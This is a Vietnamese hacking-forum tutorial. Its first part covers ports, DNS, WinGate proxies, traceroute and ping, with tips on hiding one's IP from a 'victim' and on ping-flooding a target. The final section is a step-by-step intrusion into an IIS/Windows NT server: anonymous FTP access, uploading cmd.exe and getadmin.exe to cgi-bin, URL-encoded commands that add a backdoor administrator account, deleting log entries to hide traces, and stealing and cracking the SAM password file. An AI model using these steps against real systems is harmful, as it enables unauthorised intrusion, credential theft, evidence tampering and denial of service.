PART 2 14 . ) Vitual port là gì ? _ Vitual port ( cổng ảo ) là 1 số tự nhiên đựợc gói ở trong
TCP(Tranmission Control Protocol) và UDP(User Diagram Protocol) header.
Như mọi nguòi đã biết, Windows có thể chạy nhiều chương trình 1 lúc, mỗi
chương trình này có 1 cổng riêng dùng để truyền và nhận dữ liệu. Ví dụ 1
máy có địa chỉ IP là 127.0.0.1 chạy WebServer, FTP_Server, POP3 server,
etc, những dịch vụ này đều đuọc chạy trên 1 IP address là 127.0.0.1,
khi một gói tin đuọc gửi đến làm thế nào máy tính của chúng ta phân biệt
được gói tin này đi vào dịch vụ nào WebServer hay FTP server hay SM!
TP? Chính vì thế Port xuất hiện. Mỗi dịch vụ có 1 số port mặc định, ví
dụ FTP có port mặc định là 21, web service có port mặc định là 80, POP3
là 110, SMTP là 25 vân vân.... Người quản trị mạng có thể thay đổi số
port mặc định này, nếu bạn ko biết số port trên một máy chủ, bạn ko thể
kết nối vào dịch vụ đó được. Chắc bạn đã từng nghe nói đến PORT MAPPING
nhưng có lẽ chưa biết nó là gì và chức năng thế nào. Port mapping thực
ra đơn giản chỉ là quá trình chuyển đổi số port mặc định của một dịch vụ
nào đó đến 1 số khác. Ví dụ Port mặc định của WebServer là 80, nhưng
thỉnh thoảng có lẽ bạn vẫn thấy
http://www.xxx.com:8080 , 8080 ở đây chính là số port của host
xxx nhưng đã đuợc nguòi quản trị của host này "map" từ 80 thành 8080.
( Tài liệu của HVA )
15 . ) DNS là gì ? _ DNS là viết tắt của Domain Name System. Một máy chủ DNS đợi kết
nối ở cổng số 53, có nghĩa là nếu bạn muốn kết nối vào máy chủ đó, bạn
phải kết nối đến cổng số 53. Máy chủ chạy DNS chuyển hostname bằng các
chữ cái thành các chữ số tương ứng và ngược lại. Ví dụ: 127.0.0.1 -->
localhost và localhost--->127.0.0.1 .
( Tài liệu của HVA )
16 . ) Đôi điều về Wingate : _ WinGate là một chương trình đơn giản cho phép bạn chia các kết
nối ra. Thí dụ: bạn có thể chia sẻ 1 modem với 2 hoặc nhiều máy .
WinGate dùng với nhiều proxy khác nhau có thể che giấu bạn .
_ Làm sao để Wingate có thể che dấu bạn ? Hãy làm theo tôi : Bạn
hãy telnet trên cổng 23 trên máy chủ chạy WinGate telnet proxy và bạn sẽ
có dấu nhắc WinGate > . Tại dấu nhắc này bạn đánh vào tên server,
cùng một khoảng trống và cổng bạn muốn kết nối vào. VD :
CODE
telnet wingate.net
WinGate> victim.com 23
ta telnet đến cổng 23 vì đây là cổng mặc định khi bạn cài Wingate .
lúc này IP trên máy mà victim chộp được của ta là IP của máy chủ chứa
Wingate proxy đó .
_ Làm sao để tìm Wingate ?
+ Nếu bạn muốn tìm IP WinGates tĩnh (IP không đổi) thì đến yahoo
hay một trang tìm kiếm cable modem. Tìm kiếm cable modems vì nhiều người
dùng cable modems có WinGate để họ có thể chia sẻ đường truyền rộng của
nó cable modems cho những máy khác trong cùng một nhà . Hoặc bạn có thể
dùng Port hay Domain scanners và scan Port 1080 .
+ Để tìm IP động (IP thay đổi mỗi lần user kết nối vào internet)
của WinGates bạn có thể dùng Domscan hoặc các chương trình quét khác .
Nếu dùng Domscan bạn hãy nhập khoảng IP bất kỳ vào box đầu tiên và số 23
vào box thứ 2 . Khi đã có kết quả , bạn hãy thử lần lượt telnet đến các
địa chỉ IP tìm đựơc ( đã hướng dẫn ở trên ), nếu nó xuất hiện dấu
“Wingate >” thì bạn đã tìm đúng máy đang sử dụng Wingate rồI đó .
+ Theo kinh nghiệm của tôi thì bạn hãy down wingatescanner về mà
sài , nó có rất nhièu trên mạng .
17 . ) Đôi điều về Traceroute : _ Traceroute là một chương trình cho phép bạn xác định được đường
đi của các gói packets từ máy bạn đến hệ thống đích trên mạng Internet.
_ bạn hãy xem VD sau :
CODE
C:\windows>tracert 203.94.12.54
Tracing route to 203.94.12.54 over a maximum of 30 hops
1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146
ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073
ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms
Tôi cần biết đường đi từ máy tôi đến một host trên mạng Internet có
địa chỉ ip là 203.94.12.54. Tôi cần phải tracert đến nó! Như bạn thấy ở
trên, các gói packets từ máy tôi muốn đến được 203.94.12.54 phải đi qua
13 hops(mắc xích) trên mạng. Đây là đưòng đi của các gói packets .
_ Bạn hãy xem VD tiếp theo :
CODE
host2 # traceroute xyz.com
traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms
+ Dòng đầu tiên cho biết hostname và địa chỉ IP của hệ thống đích.
Dòng này còn cho chúng ta biết thêm giá trị TTL<=30 và kích thước của
datagram là 40 bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes
user data).
+ Dòng thứ 2 cho biết router đầu tiên nhận được datagram là
202.xy.34.12, giá trị của TTL khi gởi đến router này là 1. Router này sẽ
gởi trở lại cho chương trình traceroute một ICMP message error "Time
Exceeded". Traceroute sẽ gởi tiếp một datagram đến hệ thống đích.
+ Dòng thứ 3, xyz.com(202.xx.12.34) nhận được datagram có
TTL=1(router thứ nhất đã giảm một trước đó - TTL=2-1=1). Tuy nhiên,
xyz.com không phải là một router, nó sẽ gởi trở lại cho traceroute một
ICMP error message "Port Unreachable". Khi nhận được ICMP message này,
traceroute sẽ biết được đã đến được hệ thống đích xyz.com và kết thúc
nhiệm vụ tại đây.
+ Trong trường hợp router không trả lời sau 5 giây, traceroute sẽ
in ra một dấu sao "*"(không biết) và tiếp tục gởi datagram khác đến host
đích!
_Chú ý:
Trong windows: tracert hostname
Trong unix: traceroute hostname
( Tài liệu của viethacker.net )
18 . ) Ping và cách sử dụng : _ Ping là 1 khái niệm rât đơn giản tuy nhiên rất hữu ích cho việc
chẩn đoán mạng. Tiểu sử của từ "ping" như sau: Ping là tiếng động vang
ra khi 1 tàu ngầm muốn biết có 1 vật thể khác ở gần mình hay ko, nếu có 1
vật thể nào đó gần tàu ngầm tiếng sóng âm này sẽ va vào vật thể đó và
tiếng vang lại sẽ là "pong" vậy thì tàu ngầm đó sẽ biết là có gì gần
mình.
_Trên Internet, khái niệm Ping cũng rất giống với tiểu sử của nó
như đã đề cập ở trên. Lệnh Ping gửi một gói ICMP (Internet Control
Message Protocol) đến host, nếu host đó "pong" lại có nghĩa là host đó
tồn tại (hoặc là có thể với tới đựoc). Ping cũng có thể giúp chúng ta
biêt được luợng thời gian một gói tin (data packet) đi từ máy tính của
mình đến 1 host nào đó.
_Ping thật dễ dàng, chỉ cần mở MS-DOS, và gõ "ping địa_chỉ_ip", mặc
định sẽ ping 4 lần, nhưng bạn cũng có thể gõ
CODE
"ping ip.address -t"
Cách này sẽ làm máy ping mãi. Để thay đổi kích thước ping làm như
sau:
CODE
"ping -l (size) địa_chỉ_ip "
Cái ping làm là gửi một gói tin đến một máy tính, sau đó xem xem
mất bao lâu gói tin rồi xem xem sau bao lâu gói tin đó quay trở lại,
cách này xác định được tốc độ của kết nối, và thời gian cần để một gói
tin đi và quay trở lại và chia bốn (gọi là "trip time"). Ping cũng có
thể được dùng để làm chậm đi hoặc đổ vỡ hệ thống bằng lụt ping. Windows
98 treo sau một phút lụt ping (Bộ đệm của kết nối bị tràn – có qua nhiều
kết nối, nên Windows quyết định cho nó đi nghỉ một chút). Một cuộc tấn
công “ping flood” sẽ chiếm rất nhiều băng thông của bạn, và bạn phải có
băng thông lớn hơn đối phương ( trừ khi đối phương là một máy chạy
Windows 98 và bạn có một modem trung bình, bằng cách đó bạn sẽ hạ gục
đối phương sau xấp xỉ một phút lụt ping). Lụt Ping không hiệu quả lắm
đổi với những đối phương mạnh hơn một chút. trừ khi bạn có nhiều đường
và bạn kiểm soát một số lượng tương đối các máy chủ cùng ping mà tổng
băng thông lơn hơn đối phương.
Chú ý: option –t của DOS không gây ra lụt ping, nó chỉ ping mục
tiêu một cách liên tục, với những khoảng ngắt quãng giữa hai lần ping
liên tiếp. Trong tất cả các hệ Unix hoặc Linux, bạn có thể dùng ping -f
để gây ra lụt thực sự. Thực tế là phải ping -f nếu bạn dùng một bản
tương thích POSIX (POSIX - Portable Operating System Interface dựa trên
uniX), nếu không nó sẽ không phải là một bản Unix/Linux thực sự, bởi vậy
nếu bạn dùng một hệ điều hành mà nó tự cho nó là Unix hay Linux, nó sẽ
có tham số -f.
( Tài liệu của HVA và viethacker.net )
19 . ) Kỹ thuật xâm nhập Window NT từ mạng
Internet : _ Đây là bài học hack đầu tiên mà tôi thực hành khi bắt đầu nghiên
cứu về hack , bây giờ tôi sẽ bày lại cho các bạn . bạn sẽ cần phảI có
một số thờI gian để thực hiện được nó vì nó tuy dễ nhưng khó . Ta sẽ bắt
đầu :
_ Đầu tiên bạn cần tìm một server chạy IIS :
_ Tiếp đến bạn vào DOS và đánh ' FTP <the company name>'. VD :
c:\Ftp
www.dodgyinc.com ( trang naỳ khi tôi thực hành thì vẫn còn làm được , bây giờ không
biết họ đã fix chưa , nếu bạn nào có trang nào khác thì hãy post lên cho
mọI ngườI cùng làm nhé )
Nếu connect thành công , bạn sẽ thấy một số dòng tương tự như thế
này :
CODE
Connected to
www.dodgyinc.com. 220 Vdodgy Microsoft FTP Service (Version 3.0).
User
www.dodgyinc.com:(none)): Cái mà ta thấy ở trên có chứa những thông tin rất quan trọng , nó
cho ta biết tên Netbios của máy tính là “ Vdodgy ” . Từ điều này bạn có
thể suy diễn ra tên mà được sử dụng cho NT để cho phép ta có thể khai
thác , mặc định mà dịch vụ FTP gán cho nó nếu nó chưa đổi tên sẽ là
“IUSR_VDODGY” . Hãy nhớ lấy vì nó sẽ có ích cho ta . Nhập "anonymous”
trong user nó sẽ xuất hiện dòng sau :
CODE
331 Anonymous access allowed, send identity (e-mail name) as
password.
Password:
Bây giờ passwd sẽ là bất cứ gì mà ta chưa biết , tuy nhiên , bạn
hãy thử đánh vào passwd là “anonymous” . Nếu nó sai , bạn hãy log in lạI
thiết bị FTP , bạn hãy nhớ là khi ta quay lạI lần này thì không sử dụng
cách mạo danh nữa ( anonymous ) mà sử dụng “'Guest” , thử lại passwd
với “guest” xem thế nào .
Bây giờ bạn hãy đánh lệnh trong DOS :
CODE
Cd /c
Và sẽ nhìn thấy kết quả nếu như bạn đã xâm nhập thành công , bây
giờ bạn hãy nhanh chóng tìm thư mục 'cgi-bin' . Nếu như bạn may mắn ,
bạn sẽ tìm được dễ dàng vì thông thường hệ thống quản lý đã đặt
'cgi-bin' vào nơi mà ta vừa xâm nhập để cho các ngườI quản lý họ dễ dàng
điều khiển mạng hơn . thư mục cgi-bin có thể chứa các chương trình mà
bạn có thể lợi dụng nó để chạy từ trình duyệt Web của bạn . Ta hãy bắt
đầu “quậy” nào .
_ Đầu tiên , bạn hãy chuyển tớ thư mục cgi-bin và sử dụng lệnh
“Binary” ( có thể các bạn không cần dùng lệnh này ) , sau đó bạn dánh
tiếp lệnh “put cmd.exe” . Tiếp theo là bạn cần có file hack để cài vào
thư mục này , hãy tìm trên mạng để lấy 2 file quan trọng nhất đó là
'getadmin.exe' và 'gasys.dll' . Download chúng xuống , một khi bạn đã có
nó hãy cài vào trong thư mục cgi-bin . Ok , coi như mọI việc đã xong ,
bạn hãy đóng cửa sổ DOS .
Bây giờ bạn hãy đánh địa chỉ sau lên trình duyệt của bạn :
www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGY Sau vài giây bạn sẽ có được câu trả lời như ở dướI đây :
CODE
CGI Error
The specified CGI application misbehaved by not returning a
complete set of HTTP headers. The headers it did return are:
Congratulations , now account IUSR_VDODGY have administrator
rights!
Thế là bạn đã mạo danh admin để xâm nhập hệ thống , việc cần thiết
bây giờ là bạn hãy tự tạo cho mình một account , hãy đánh dòng sau trên
IE :
www.dodgyinc.com/cgi- bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20toilahacker%20/add
dòng lệnh trên sẽ tạo cho bạn một account login với user :
anhdenday và passwd : toilahackerBây giờ bạn hãy là cho user này có
account của admin , bạn chỉ cần đánh lên IE lệnh :
www.dodgyinc.com/cgi-bin/getadmin.exe?anhdenday Vậy là xong rùi đó , bạn hãy disconnect và đến start menu ->
find rồi search computer '
www.dodgyinc.com'. Khi tìm thấy , bạn vào
explore , explore NT sẽ mở ra bạn hay nhập user và passwd để mở nó ( của
tôi là user : anhdenday và passwd : toilahacker ) .
Có một vấn đề là khi bạn xâm nhập hệ thống này thì sẽ bị ghi lại ,
do đó để xoá dấu vết bạn hãy vào 'Winnt\system32\logfiles' mở file log
đó rồI xoá những thông tin liên quan đến bạn , rồI save chúng . Nếu bạn
muốn lấy một thông báo gì về việc chia sẽ sự xâm nhập thì bạn hãy thay
đổi ngày tháng trên máy tính vớI URL sau :
www.dodgyinc.com/cgi-bin/cmd.exe?/c%20date%2030/04/03 xong rồI bạn hãy xoá file 'getadmin.exe', và 'gasys.dll' từ
'cgi-bin' . Mục đích khi ta xâm nhập hệ thống này là “chôm” pass của
admin để lần sau xâm nhập một cách hợp lệ , do đó bạn hãy tìm file SAM (
chứa pass của admin và member ) trong hệ thống rồI dùng chương trình
“l0pht crack” để crack pass ( Hướng dẫn về cách sử dụng “l0pht crack v
3.02” tôi đã post lên rồi ,các bạn hãy tự nghiên cứu nhé ) . Đây là link
:
www.vnhacker.org/forum/xxxx=ST&f=6&t=11566&s= (Ghi chú của PXMMRF : Link này không có thể viết đầy dủ ở đây ,
do HVA forum áp dụng một số Input Validation Filter rule nhằm bảo mật -
xin thay xxxx bằng ?act
]
Khi crack xong các bạn đã có user và pass của admin rồI , bây giờ
hãy xoá account của user ( của tôi là “anhdenday” ) đi cho an toàn . Bạn
đã có thể làm gì trong hệ thống là tuỳ thích , nhưng các bạn đừng xoá
hết tài liệu của họ nhé , tội cho họ lắm .
Bạn cảm thấy thế nào , rắc rối lắm phải không . Lúc tôi thử hack
cách này , tôi đã mày mò mất cả 4 giờ , nếu như bạn đã quen thì lần thứ 2
bạn sẽ mất ít thờI gian hơn .
Ở phần 3 tôi sẽ đề cập đến HĐH Linux , đến cách ngắt mật khẩu bảo
vệ của một Web site , và làm thế nào để hack một trang web đơn giản nhất
.v.v…
GOOKLUCK !!!!!! 
![![b]un ♥](https://2img.net/u/3114/22/91/64/avatars/82-63.jpg)
